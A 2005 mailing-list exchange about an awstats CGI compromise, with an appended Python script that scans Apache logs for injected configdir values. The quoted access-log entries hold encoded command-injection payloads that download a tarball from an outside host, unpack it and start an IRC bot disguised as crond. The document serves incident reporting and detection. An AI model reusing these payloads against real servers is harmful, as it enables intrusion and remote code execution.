On Fri, 04.03.2005, at 17:40, Chris Strzelczyk wrote:
> I just thought I would let you know how my server got compromised. This
> even happened after I installed the new version of awstats on Wednesday.
> So in short I don't know if it is OK to run awstats as a cgi executable.
>
> These are from my access log:
>
> "GET
> /cgi-bin/awstats.pl?
> configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
> 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta
> r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
> ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
>
> "GET
> /cgi-bin/awstats.pl?
> configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi
> lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20
> psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%
> 2500 HTTP/1.1" 200 634 "-" "-"
>
>
> -cs

Thank you for this report. So you are saying that even with awstats 6.4
you got compromised as Apache did execute the logged command and a
trojan then started running located in /tmp?

If so, would you please be so kind and report that issue to the awstats
project guys as soon as possible?

Alexander

-- 
Alexander Dalloz | Enger, Germany | GPG http://pgp.mit.edu 0xB366A773
legal statement: http://www.uni-x.org/legal.html
Fedora Core 2 GNU/Linux on Athlon with kernel 2.6.10-1.14_FC2smp
Serendipity 18:32:39 up 11 days, 5:41, load average: 0.20, 0.17, 0.25
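For anyone checking their own access logs for requests of the kind quoted above, here is a log scan added as an example; it is not part of the original thread and not awstats code. It assumes Apache access-log entries with the request line in double quotes; the function names and the sample entries are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line as it appears in an Apache access-log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Characters a directory path never needs but a shell acts on (plus NUL, CR, LF).
SUSPICIOUS = re.compile(r"[|;`$&<>\x00\r\n]")

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding such as %2500 -> %00 -> NUL."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return the decoded configdir value and its suspicious characters, or None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if not parts.path.endswith("/awstats.pl"):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "configdir":
            continue
        decoded = fully_decode(value)
        chars = sorted(set(SUSPICIOUS.findall(decoded)))
        if chars:
            return {"decoded": decoded, "chars": chars}
    return None

def scan_log(lines):
    """Return (line_number, finding) for every flagged entry."""
    findings = ((n, scan_line(line)) for n, line in enumerate(lines, 1))
    return [(n, f) for n, f in findings if f]

# Constructed sample entries (documentation addresses, harmless echo markers only).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2005:17:01:02 +0100] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.66 - - [04/Mar/2005:17:03:41 +0100] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20b_exp%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"',
    '192.0.2.10 - - [04/Mar/2005:17:05:09 +0100] "GET /cgi-bin/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.77 - - [04/Mar/2005:17:06:30 +0100] "GET /index.php?q=a%7cb HTTP/1.1" 200 300 "-" "-"',
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(number, finding["chars"], repr(finding["decoded"]))
```

A hit only shows that such a request was received; whether the command ran has to be established from the host itself, for example unexpected files in /tmp or unfamiliar processes owned by the web server user.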